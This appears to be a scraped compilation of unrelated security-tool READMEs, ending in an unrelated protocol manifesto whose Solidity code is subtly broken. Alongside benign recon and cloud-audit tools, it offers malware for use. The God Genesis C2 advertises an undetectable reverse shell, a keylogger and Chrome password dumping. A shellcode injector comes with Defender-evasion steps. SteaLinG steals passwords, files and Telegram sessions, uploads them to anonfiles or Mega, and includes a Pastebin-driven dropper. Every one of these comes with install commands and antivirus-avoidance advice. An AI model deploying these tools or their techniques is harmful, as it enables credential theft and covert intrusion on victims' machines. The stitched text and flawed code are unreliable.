$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install
Arg | Long Arg | Description |
---|---|---|
-i | --input | Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file. |
-o | --output | The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed. |
-op | --output-params | The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed. |
-ow | --output-overwrite | If the output file already exists, it will be overwritten instead of being appended to. |
-sp | --scope-prefix | Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-spo | --scope-prefix-original | If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false) |
-sf | --scope-filter | Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used. |
-c | --cookies † | Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
|
-H | --headers † | Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
|
-ra | --regex-after | RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output. |
-d | --depth † | The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix ) argument to ensure a request to links found without a domain can be attempted. |
-p | --processes † | Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25) |
-x | --exclude | Additional Link exclusions (to the list in config.yml ) in a comma separated list, e.g. careers,forum
|
-orig | --origin | Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false) |
-t | --timeout † | How many seconds to wait for the server to send data before giving up (default: 10 seconds) |
-inc | --include | Include input (-i ) links in the output (default: false) |
-u | --user-agent † | What User Agents to get links for, e.g. -u desktop mobile
|
-insecure | † | Whether TLS certificate checks should be disabled when making requests (delfault: false) |
-s429 | † | Stop when > 95 percent of responses return 429 Too Many Requests (default: false) |
-s403 | † | Stop when > 95 percent of responses return 403 Forbidden (default: false) |
-sTO | † | Stop when > 95 percent of requests time out (default: false) |
-sCE | † | Stop when > 95 percent of requests have connection errors (default: false) |
-m | --memory-threshold | The memory threshold percentage. If the machines memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95) |
-mfs | --max-file-size † | The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size os over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size.. |
-replay-proxy | † | For active link finding with URL (or file of URLs), replay the requests through this proxy. |
-ascii-only | Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason. | |
-v | --verbose | Verbose output |
-vv | --vverbose | Increased verbose output |
-h | --help | show the help message and exit |
† NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE
The config.yml
file has the keys which can be updated to suit your needs:
linkExclude
- A comma separated list of strings (e.g. .css,.jpg,.jpeg
etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.contentExclude
- A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg
etc.) that all responses Content-Type
headers are checked against. Any responses with the these content types will be excluded and not checked for links.fileExtExclude
- A comma separated list of strings (e.g. .zip,.gz,.tar
etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.regexFiles
- A list of file types separated by a pipe character (e.g. php|php3|php5
etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
respParamLinksFound
† - Whether to get potential parameters from links found in responses: True
or False
respParamPathWords
† - Whether to add path words in retrieved links as potential parameters: True
or False
respParamJSON
† - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True
or False
respParamJSVars
† - Whether javascript variables set with var
, let
or const
are added as potential parameters: True
or False
respParamXML
† - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True
or False
respParamInputField
† - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True
or False
respParamMetaName
† - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True
or False
† IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True
python3 xnLinkFinder.py -i target.com
Ideally, provide scope prefix (-sp
) with the primary domain (including schema), and a scope filter (-sf
) to filter the results only to relevant domains (this can be a file or in scope domains). Also, you can pass cookies and customer headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile
) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d
) will keep sending request to links found on the previous depth search to find more links.
python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10
If you have a file of JS file URLs for example, you can look for links in those:
python3 xnLinkFinder.py -i target_js.txt
If you have a files, e.g. JS files, HTTP responses, etc. you can look for links in those:
python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com
NOTE: Sub directories are also checked. The -mfs
option can be specified to skip files over a certain size.
In Burp, select the items you want to search by highlighting the scope for example, right clicking and selecting the Save selected items
. Ensure that the option base64-encode requests and responses
option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_burp.xml
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
starts with <?xml
then you are trying to process a Burp file.
Ideally, provide scope prefix (-sp
) with the primary domain (including schema), and a scope filter (-sf
) to filter the results only to relevant domains.
python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv
In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report
and selecting Export Messages to File...
. This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):
python3 xnLinkFinder.py -i target_zap.txt
NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i
is in the format ==== 99 ==========
for example, then you are trying to process an OWASP ZAP ASCII text file.
You can pipe xnLinkFinder to other tools. Any errors are sent to stderr
and any links found are sent to stdout
. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:
python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u
You can also pass the input through stdin
instead of -i
.
cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf rebbull.* -d 3
NOTE: You can't pipe in a Burp or ZAP file, these must be passed using -i
.
-sp
. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no path should be included, and no wildcards used. Schema is optional, but will default to http): http://www.target.com
https://target-payments.com
https://static.target-cdn.com
/path/to/example.js
then giving passing -sp http://www.target.com
will result in teh output http://www.target.com/path/to/example.js
and if Depth (-d
) is >1 then a request will be able to be made to that URL to search for more links. If a file of domains are passed using -sp
then the output will include each domain followed by /path/to/example.js
and increase the chance of finding more links.-sp
but still want the original link of /path/to/example.js
(without a domain) additionally returned in the output, the pass the argument -spo
.-sf
. This will ensure that only relevant domains are returned in the output, and more importantly if Depth (-d
) is >1 then out of scope targets will not be searched for links or parameters. This can be one scope domain, or a file containing multiple scope domains. Below are examples of the format used (no schema or path should be included): target.*
target-payments.com
static.target-cdn.com
-ra
. It's always a good idea to use https://regex101.com/ to check your Regex expression is going to do what you expect.-v
option to have a better idea of what the tool is doing.-vv
option which may show errors that are occurring, which can possibly be resolved, or you can raise as an issue on github.-c
), headers (-H
) and regex (-ra
) values within single quotes, e.g. -ra '/api/v[0-9]\.[0-9]\*'
-o
option to give a specific output file name for Links, rather than the default of output.txt
. If you plan on running a large depth of searches, start with 2 with option -v
to check what is being returned. Then you can increase the Depth, and the new output will be appended to the existing file, unless you pass -ow
.-op
option to give a specific output file name for Potential Parameters, rather than the default of parameters.txt
. Any output will be appended to the existing file, unless you pass -ow
.-d
) be wary of some sites using dynamic links so will it will just keep finding new ones. If no new links are being found, then xnlLinkFinder will stop searching. Providing the Stop flags (s429
, s403
, sTO
, sCE
) should also be considered.-d
value is high), and have limited resources, the program will stop when it reaches the memory Threshold (-m
) value and end gracefully with data intact before getting killed.Ctrl-C
) in the middle of running, be patient and any gathered data will be saved before ending gracefully.-orig
option will show the URL where the link was found. This can mean you have duplicate links in the output if the same link was found on multiple sources, but it will suffixed with the origin URL in square brackets.desktop
. If you have a target that could have different links for different user agent groups, the specify -u desktop mobile
for example (separate with a space). The mobile
user agent option is an combination of mobile-apple
, mobile-android
and mobile-windows
.-i
has been set to a directory, the contents of the files in the root of that directory will be searched for links. Files in sub-directories are not searched. Any files that are over the size set by -mfs
(default: 500 MB) will be skipped.-replay-proxy
option, sometimes requests can take longer. If you start seeing more Request Timeout
errors (you'll see errors if you use -v
or -vv
options) then consider using -t
to raise the timeout limit.-ascii-only
. This can eliminate a number of false positives that can sometimes get returned from binary data.If you come across any problems at all, or have ideas for improvements, please feel free to raise an issue on Github. If there is a problem, it will be useful if you can provide the exact command you ran and a detailed description of the problem. If possible, run with -vv
to reproduce the problem and let me know about any error messages that are given.
Active link finding for a domain:
...Piped input and output:
Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)
JSubFinder is a tool writtin in golang to search webpages & javascript for hidden subdomains and secrets in the given URL. Developed with BugBounty hunters in mind JSubFinder takes advantage of Go's amazing performance allowing it to utilize large data sets & be easily chained with other tools.
Install the application and download the signatures needed to find secrets
Using GO:
go get github.com/ThreatUnkown/jsubfinder
wget https://raw.githubusercontent.com/ThreatUnkown/jsubfinder/master/.jsf_signatures.yaml && mv .jsf_signatures.yaml ~/.jsf_signatures.yaml
or
Search the given url's for subdomains and secrets
$ jsubfinder search -h
Execute the command specified
Usage:
JSubFinder search [flags]
Flags:
-c, --crawl Enable crawling
-g, --greedy Check all files for URL's not just Javascript
-h, --help help for search
-f, --inputFile string File containing domains
-t, --threads int Ammount of threads to be used (default 5)
-u, --url strings Url to check
Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
Examples (results are the same in this case):
$ jsubfinder search -u www.google.com
$ jsubfinder search -f file.txt
$ echo www.google.com | jsubfinder search
$ echo www.google.com | httpx --silent | jsubfinder search$
apis.google.com
ogs.google.com
store.google.com
mail.google.com
accounts.google.com
www.google.com
policies.google.com
support.google.com
adservice.google.com
play.google.com
note --secrets=""
will save the secret results in a secrets.txt file
$ echo www.youtube.com | jsubfinder search --secrets=""
www.youtube.com
youtubei.youtube.com
payments.youtube.com
2Fwww.youtube.com
252Fwww.youtube.com
m.youtube.com
tv.youtube.com
music.youtube.com
creatoracademy.youtube.com
artists.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
$ echo www.google.com | jsubfinder search -crawl -s "google_secrets.txt" -S -o jsf_google.txt -t 10 -g
-crawl
use the default crawler to crawl pages for other URL's to analyze-s
enables JSubFinder to search for secrets-S
Silence output to console-o <file>
save output to specified file-t 10
use 10 threads-g
search every URL for JS, even ones we don't think have anyEnables the upstream HTTP proxy with TLS MITM sypport. This allows you to:
$ JSubFinder proxy -h
Execute the command specified
Usage:
JSubFinder proxy [flags]
Flags:
-h, --help help for proxy
-p, --port int Port for the proxy to listen on (default 8444)
--scope strings Url's in scope seperated by commas. e.g www.google.com,www.netflix.com
-u, --upstream-proxy string Adress of upsteam proxy e.g http://127.0.0.1:8888 (default "http://127.0.0.1:8888")
Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
$ jsubfinder proxy
Proxy started on :8444
Subdomain: out.reddit.com
Subdomain: www.reddit.com
Subdomain: 2Fwww.reddit.com
Subdomain: alb.reddit.com
Subdomain: about.reddit.com
Burp Suite will now forward all traffic proxied through it to JSubFinder. JSubFinder will retrieve the response, return it to burp and in another thread search for subdomains and secrets.
proxify -output logs
jsubfinder proxy -u http://127.0.0.1:8443
replay -output logs -burp-addr http://127.0.0.1:8444
Simple, run JSubFinder in proxy mode on another server e.g 192.168.1.2. Follow the proxy steps above but set your applications upstream proxy as 192.168.1.2:8443
$ jsubfinder proxy --scope www.reddit.com -p 8081 -S -o jsf_reddit.txt
--scope
limits JSubFinder to only analyze responses from www.reddit.com
-p
port JSubFinders proxy server is running on-S
silence output to the console/stdout-o <file>
output examples to this fileGod Genesis is a C2 server purely coded in Python3 created to help Red Teamers and Penetration Testers. Currently It only supports TCP reverse shell but wait a min, its a FUD and can give u admin shell from any targeted WINDOWS Machine.
The List Of Commands It Supports :-
===================================================================================================
BASIC COMMANDS:
===================================================================================================
help --> Show This Options
terminate --> Exit The Shell Completely
exit --> Shell Works In Background And Prompted To C2 Server
clear --> Clear The Previous Outputs
===================================================================================================
SYSTEM COMMANDS:
===================================================================================================
cd --& gt; Change Directory
pwd --> Prints Current Working Directory
mkdir *dir_name* --> Creates A Directory Mentioned
rm *dir_name* --> Deletes A Directoty Mentioned
powershell [command] --> Run Powershell Command
start *exe_name* --> Start Any Executable By Giving The Executable Name
===================================================================================================
INFORMATION GATHERING COMMANDS:
===================================================================================================
env --> Checks Enviornment Variables
sc --> Lists All Services Running
user --> Current User
info --> Gives Us All Information About Compromised System
av --> Lists All antivirus In Compromised System
===================================================================================================
DATA EXFILTRATION COMMANDS:
===================================================================================================
download *file_name* --> Download Files From Compromised System
upload *file_name* --> Uploads Files To Victim Pc
===================================================================================================
EXPLOITATION COMMANDS:
========================================================== =========================================
persistence1 --> Persistance Via Method 1
persistence2 --> Persistance Via Method 2
get --> Download Files From Any URL
chrome_pass_dump --> Dump All Stored Passwords From Chrome Bowser
wifi_password --> Dump Passwords Of All Saved Wifi Networks
keylogger --> Starts Key Logging Via Keylogger
dump_keylogger --> Dump All Logs Done By Keylogger
python_install --> Installs Python In Victim Pc Without UI
Check The Video To Get A Detail Knowledge
1. The Payload.py is a FULLY UNDETECTABLE(FUD) use your own techniques for making an exe file. (Best Result When Backdoored With Some Other Legitimate Applictions)
2. Able to perform privilege escalation on any windows systems.
3. Fud keylogger
4. 2 ways of achieving persistance
5. Recon automation to save your time.
How To Use Our Tool :
git clone https://github.com/SaumyajeetDas/GodGenesis.git
pip3 install -r requirements.txt
python3 c2c.py
It is worth mentioning that Suman Chakraborty have contributed in the framework by coding the the the Fud Keyloger, Wifi Password Extraction and Chrome Password Dumper modules.
Dont Forget To Change The IP ADDRESS Manually in both c2c.py and payload.py
Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed specifically for AWS and focuses on enabling high scale, low cost, and zero-ops. Matano deploys fully into your AWS account.
Matano lets you collect log data from sources using S3 or SQS based ingestion.
Matano normalizes and transforms your data using Vector Remap Language (VRL). Matano works with the Elastic Common Schema (ECS) by default and you can define your own schema.
Log data is always stored in S3 object storage, for cost effective, long term, durable storage.
All data is ingested into an Apache Iceberg based data lake, allowing you to perform ACID transactions, time travel, and more on all your log data. Apache Iceberg is an open table format, so you always own your own data, with no vendor lock-in.
Matano is a fully serverless platform, designed for zero-ops and unlimited elastic horizontal scaling.
Write Python detections to implement realtime alerting on your log data.
View the complete installation instructions.
You can install the matano CLI to deploy Matano into your AWS account, and manage your Matano deployment.
Matano provides a nightly release with the latest prebuilt files to install the Matano CLI on GitHub. You can download and execute these files to install Matano.
For example, to install the Matano CLI for Linux, run:
curl -OL https://github.com/matanolabs/matano/releases/download/nightly/matano-linux-x64.sh
chmod +x matano-linux-x64.sh
sudo ./matano-linux-x64.sh
Read the complete docs on getting started.
To get started with Matano, run the matano init
command. Make sure you have AWS credentials in your environment (or in an AWS CLI profile).
The interactive CLI wizard will walk you through getting started by generating an initial Matano directory for you, initializing your AWS account, and deploying Matano into your AWS account.
Initial deployment takes a few minutes.
View our complete documentation.
Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).
Firstly, generate a payload in binary format( using either CobaltStrike
or msfvenom
) for instance, in msfvenom
, you can do it like so( the payload I'm using is for illustration purposes, you can use whatever payload you want ):
msfvenom -p windows/messagebox -f raw -o shellcode.bin
Then convert the shellcode( in binary/raw format ) into a UUID
string format using the Python3 script, bin_to_uuid.py
:
./bin_to_uuid.py -p shellcode.bin > uuid.txt
xor
encrypt the UUID
strings in the uuid.txt
using the Python3 script, xor_encryptor.py
.
./xor_encryptor.py uuid.txt > xor_crypted_out.txt
Copy the C-style
array in the file, xor_crypted_out.txt
, and paste it in the C++ file as an array of unsigned char
i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}
This shellcode injection technique comprises the following subsequent steps:
VirtualAlloc
xor
decrypts the payload using the xor
key valueUuidFromStringA
to convert UUID
strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory
or memcpy
.EnumChildWindows
to execute the payload previously loaded into memory( in step 1 )memcpy
or WriteProcessMemory
which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA
which can be used to decode data as well as write it to memory( Isn't that great folks? And please don't say "NO!" :) ).xor
key(row 86) to what you wish. This can be done in the ./xor_encryptor.py
python3 script by changing the KEY
variable.executable filename
value(row 90) to your filename.mingw
was used but you can use whichever compiler you prefer. :)make
The binary was scanned using antiscan.me on 01/08/2022.
https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it
This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes
module | Short description |
---|---|
Dump password | steal All passwords saved , upload file a passwords saved to mega |
Dump History | dump browser history |
dump files | Steal files from the hard drive with the extension you want |
module | Short description |
---|---|
1-Telegram Session Hijack | Telegram session hijacker |
C:\Users<pc name >\AppData\Roaming\Telegram Desktop
in the 'tedata' folderC:
└── Users
├── .AppData
│ └── Roaming
│ └── TelegramDesktop
│ └── tdata
Once you have moved this folder with all its contents on your device in the same path, then you do what will happen for it is that simple The tool does all this, all you have to do is give it your token on the site https://anonfiles.com/
The first step is to go to the path where the tdata file is located, and then convert it to a zip file. Of course, if the Telegram was working, this would not happen. If there was any error, it means that the Telegram is open, so I would do the kill processes. antivirus You will see that this is malicious behavior, so I avoided this part at all by the try and except in the code The name of the archive file is used in the name of the device of your victim, because if you have more than one, I mean, after that, you will post request for the zipfile on the anonfiles website using the API key or the token of your account on the site. On it, you will find your token Just that, teacher, and it is not exposed from any AV
module |
---|
2- Dropper |
URL
of the virus or whatever you want to download to the victim's device, but keep in mind that the URL must be direct
, meaning that it must be the end Its Yama .exe or .png,
whatever is important is that it be a link that ends with a backstamp The second thing is to take the API Kay from you, and you will answer it as well. Either you register, click on the word API, you will find it, and you will take the username and password So how does it work?
The first thing is to create a paste on the site and make it private Then it adds the url you gave it and then it gives you the exe file, its function is that when it works on any device it starts adding itself to Registry device in two different ways It starts to open pastebin and inserts the special paste you created, takes the paste url, downloads its content and runs And you can enter the url at any time and put another url. It is very normal because the dropper goes every 10 minutes. Checks the URL. If it finds it, it changes it, downloads its content, downloads it, and connects to find it. You don't do anything, and so, every 10 minutes, you can literally do it, you can access your device from anywhere
3- Linux support
4-You can now choose between Mega or Pastebin
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py
git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py
* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!
Monkey365 is an Open Source security tool that can be used to easily conduct not only Microsoft 365, but also Azure subscriptions and Azure Active Directory security configuration reviews without the significant overhead of learning tool APIs or complex admin panels from the start. To help with this effort, Monkey365 also provides several ways to identify security gaps in the desired tenant setup and configuration. Monkey365 provides valuable recommendations on how to best configure those settings to get the most out of your Microsoft 365 tenant or Azure subscription.
Monkey365 is a plugin-based PowerShell module that can be used to review the security posture of your cloud environment. With Monkey365 you can scan for potential misconfigurations and security issues in public cloud accounts according to security best practices and compliance standards, across Azure, Azure AD, and Microsoft365 core applications.
You can either download the latest zip by clicking this link or download Monkey365 by cloning the repository:
Once downloaded, you must extract the file and extract the files to a suitable directory. Once you have unzipped the zip file, you can use the PowerShell V3 Unblock-File cmdlet to unblock files:
Get-ChildItem -Recurse c:\monkey365 | Unblock-File
Once you have installed the monkey365 module on your system, you will likely want to import the module with the Import-Module cmdlet. Assuming that Monkey365 is located in the PSModulePath
, PowerShell would load monkey365 into active memory:
Import-Module monkey365
If Monkey365 is not located on a PSModulePath
path, you can use an explicit path to import:
Import-Module C:\temp\monkey365
You can also use the Force
parameter in case you want to reimport the Monkey365 module into the same session
Import-Module C:\temp\monkey365 -Force
The following command will provide the list of available command line options:
Get-Help Invoke-Monkey365
To get a list of examples use:
Get-Help Invoke-Monkey365 -Examples
To get a list of all options and examples with detailed info use:
Get-Help Invoke-Monkey365 -Detailed
The following example will retrieve data and metadata from Azure AD and SharePoint Online and then print results. If credentials are not supplied, Monkey365 will prompt for credentials.
$param = @{
Instance = 'Microsoft365';
Analysis = 'SharePointOnline';
PromptBehavior = 'SelectAccount';
IncludeAzureActiveDirectory = $true;
ExportTo = 'PRINT';
}
$assets = Invoke-Monkey365 @param
Monkey365 helps streamline the process of performing not only Microsoft 365, but also Azure subscriptions and Azure Active Directory Security Reviews.
160+ checks covering industry defined security best practices for Microsoft 365, Azure and Azure Active Directory.
Monkey365 will help consultants to assess cloud environment and to analyze the risk factors according to controls and best practices. The report will contain structured data for quick checking and verification of the results.
By default, the HTML report shows you the CIS (Center for Internet Security) Benchmark. The CIS Benchmarks for Azure and Microsoft 365 are guidelines for security and compliance best practices.
The following standards are supported by Monkey365:
More standards will be added in next releases (NIST, HIPAA, GDPR, PCI-DSS, etc..) as they are available.
Additional information such as Installation or advanced usage can be found in the following link
The protocol aims to develop a application layer abstraction for the Hyper Service Transfer Protocol.
HSTP is a recursion as nature of HSTP. This protocol implements itself as a interface. On every internet connected device, there is a HSTP instance. That's why the adoption is not needed. HSTP already running top of the internet. We have just now achieved to explain the protocol over protocols on heterogeneous networks. That's why do not compare with web2, web3 or vice versa.
HSTP is a application representation interface for heterogeneous networks.
HSTP interface enforces to implement a set of methods to be able to communicate with other nodes in the network. Thus serves, clients, and other nodes can communicate with each other with trust based, end to end encrypted way. By the time the node resolution is based on fastest path resolution algorithm I wrote.
Story time!
A small overview
Think about, we're in the situation of one mother and one father lives a happy life. They had a baby! Suddenly, the mother needed to drink pills regularly to cure a disase. The pill is a poison for the baby. The baby is crying and the mother calls father because he is the only trusted person to help the baby. But the father sometime can not stay at home, he needs to do something to feed the baby. Father heard one milkman has fresh and high quality milks for low price. Father decides to try to talk the milkman, milkman deliver the milk to the father, father carry the milk to the mother. Mother give the milk to the baby. Baby is happy now and the baby sleeps, mother see the baby is happy.
The family never buy the milk from outside, this is the first time they buy milk for the baby: (Mom do not know the number of milkman, milkman do not know the home address)
As steps:
0) - Baby wants to drink milk.
1) - Baby cries to the mom.
3) - Mom see the baby is crying.
4) - Mom checks the fridge. Mom sees the milk is empty. (Mother is only trusting the Father)
5) - Mom calls the father.
6) - Father calls the milkman.
7) - Milkman delivers the milk to father.
8) - Father delivers the milk to mom.
9) - Mom gives the milk to the baby.
10) - Baby drinks the milk.
11) - Baby is happy.
12) - Baby sleeps.
13) - Mother see the baby is happy and sleeps.
14) - In order to be able to contact the milkman again, the mother asks the father to tell her that she wants the milkman to save the address of the house and the mobile phone of the mother.
15) - Mother calls the father.
16) - Father calls the milkman.
17) - Milkman saves the address of the house and the mobile phone of the mother.
Oops, tomorrow baby wakes up and cries again,
0) - Baby wants to drink milk.
1) - Baby cries to the mom.
2) - Mom see the baby is crying.
3) - Mom checks the fridge. Mom sees the milk is empty. (Mother is trusting the Father had right decision in the first place by giving the address to the milkman, and the milkman had right decision in the first place by saving the address of the house and the mobile phone of the mother.)
4) - Mother calls the milkman (Mother is trusting the Father's decision only)
5) - Milkman delivers the milk to mom.
6) - Mom gives the milk to the baby.
7) - Baby drinks the milk.
8) - Baby is happy.
9) - Baby sleeps.
10) - Mother see the baby is happy and sleeps.
11) - Mother is happy and the mother trust the milkman now.
this document you're reading is a manifest for the internet people to connecting the other people by trusting the service serve the client and the trust only can be maintainable by providing good services. trust is the key, but not enough for survive. the service has to be reliable, consistent, cheap. unless the people will decide to not ask from you again.
So, it's easy right? It's so simple to understand, who are those people in the story?
also,
Baby is in trusted hands. Nothing to worry about. They love you, you will understand when you grow up and have a child.
// Technical step explanation soon, but not that hard as you see.
HSTP is a interface, which is a set of methods that must be implemented by the application layer. The interface is used to communicate with other nodes in the network. The interface is designed to be used in a heterogeneous network.
HSTP shall be implemented on any layer of network connected devices/environment.
HSTP node could be a TCP server, HTTP server, static file or contract in any chain. One HSTP node is able to call any other HSTP node. Thus the nodes can call each other freely, they can check their system status, and they can communicate with each other.
HSTP is already implemented on language level, by people for people. English is mostly adopted language around the Earth. JavaScript could be known also mostly adopted language for browser environments. Solidity is for EVM-based chains, hyperbees for TCP based networks, etc.
HSTP interface shall be applied between any HSTP connected devices/networks.
Infinitive scaling options: Any TCP connected device can talk with any other TCP connected device over HSTP. That means any web browser is serve of another HSTP node, and any web browser can call any other web browser.
Uniform application representation interface: HSTP is a uniform interface, which is a set of methods that must be implemented by the application layer.
Heterogeneous networks: Any participant of network is allowing to share the resources with other participants of the network. The resources can be CPU, memory, storage, network, etc.
Conjucation of web versions Since the blockchain technologies calling as web3, people started discussing about the differanciates between the web's. Comparing is a behaviour for incremental numeric system education's mindset. Which one is better: none of them. We have to build systems could talk in one uniform protocol, underneath services could be anything. HSTP is aiming for that.
Registry interface Registry interface designed for using on TCP layer, to be able to register top level tld nodes in the network. The first implementation of HSTP TCP relay will resolve hstp/
The registry has two parts of the interface:
Registry implementation needs two HSTP node,
Router interface
For demonstration purposes, we will use the following solidity example:
// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;
import "./HSTP.sol";
import "./ERC165.sol";
enum Operation {
Query,
Mutation
}
struct Response {
uint256 status;
string body;
}
struct Registry {
HSTP resolver;
}
// HSTP/Router.sol
abstract contract Router is ERC165 {
event Log(address indexed sender, Operation operation, bytes payload);
event Register(address indexed sender, Registry registry);
mapping(string => Registry) public routes;
function reply(string memory name, Operation _operation, bytes memory payload) public virtual payable returns(Response memory response) {
emit Log(msg.sender, _operation, payload);
// Traverse upwards and downwards of the tree.
// Tries to find the closest path for given operation.
// If the route is registered on HSTP node, reply from children node.
// If the node do not have the route on this node, ask for parent.
if (routes[name]) {
if (_operation == Operation.Query) {
return this.query(payload);
} else if (_operation == Operation.Mutation) {
return this.mutation(payload);
}
}
return super.reply(name, _operation, payload);
}
function query(string memory name, bytes memory payload) public view returns (Response memory) {
return routes[name].resolver.query(payload);
}
function mutation(string memory name, bytes memory payload) public payable returns (Response memory) {
return routes[name].resolver.mutation(payload);
}
function register(string memory name, HSTP node) public {
Registry memory registry = Registry({
resolver: node
});
emit Register(msg.sender, registry);
routes[name] = registry;
}
function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
return interfaceId == type(HSTP).interfaceId;
}
}
HSTP interface
// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;
import "./Router.sol";
// Stateless Hyper Service Transfer Protocol for on-chain services.
// Will implement: EIP-4337 when it's on final stage.
// https://github.com/ethereum/EIPs/blob/master/EIPS/eip-4337.md
abstract contract HSTP is Router {
constructor(string memory name) {
register(name, this);
}
function query(bytes memory payload)
public
view
virtual
returns (Response memory);
function mutation(bytes memory payload)
public
payable
virtual
returns (Response memory);
}
Example HSTP Node
HSTP node has access to call parent router by super.reply(name, operation, payload) method. HSTP node can also call children nodes by calling this.query(payload) or this.mutation(payload) methods.
A HSTP node can be a smart contract, or a web browser, or a TCP connected device.
Node has full capability of adding more HSTP nodes to the network or itself as sub services.
HSTP HSTP
/ \ / \
HSTP HSTP HSTP
/ \
HSTP HSTP
/ /
HSTP HSTP
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "hstp/HSTP.sol";
// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {
struct ITodo {
string todo;
}
function addTodo(ITodo memory request) public payable returns(Response memory response) {
response.body = request.todo;
return response;
}
// Override for HSTP.
function query(bytes memory payload)
public
view
virtual
override
returns (Response memory) {}
function mutation(bytes memory payload)
public
payable
virtual
override
returns (Response memory) {
